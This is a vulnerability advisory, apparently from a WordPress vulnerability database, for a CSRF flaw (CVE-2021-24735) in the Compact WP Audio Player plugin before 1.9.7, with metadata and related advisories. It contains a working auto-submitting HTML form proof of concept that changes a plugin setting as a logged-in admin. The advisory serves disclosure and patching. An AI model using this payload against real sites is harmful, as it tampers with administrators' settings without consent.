Compact WP Audio Player < 1.9.7 – Setting Change via CSRF | CVE 2021-24735 | Plugin Vulnerabilities

Description

The plugin does not implement nonce checks, which could allow attackers to make a logged in admin change the "Disable Simultaneous Play" setting via a CSRF attack.

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=compact-wp-audio-player%2Fsc_audio_player.php" method="post" id="csrf">
<input name="sc_audio_player_settings" value="1" type="hidden">
<input name="sc_audio_disable_simultaneous_play" value="1" type="hidden">
</form>
<script>csrf.submit()</script>

Affects Plugins

compact-wp-audio-player

Fixed in 1.9.7

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

dcbcf6e7-e5b3-498b-9f5e-7896d309441f

Timeline

Publicly Published

2021-09-15 (about 2 years ago)

Added

2021-09-15 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2024-01-09

Title

Auto Affiliate Links < 6.4.2.8 - Cross-Site Request Forgery

Published

2019-06-18

Title

Facebook for WooCommerce < 1.9.15 - CSRF allowing Option Update

Published

2021-09-07

Title

Weather Effect < 1.3.4 - CSRF to Stored Cross-Site Scripting

Published

2023-12-07

Title

Custom Post Type Page Template <= 1.1 - Cross-Site Request Forgery

Published

2023-02-09

Title

ImageMagick Engine < 1.7.6 - PHAR Deserialization via CSRF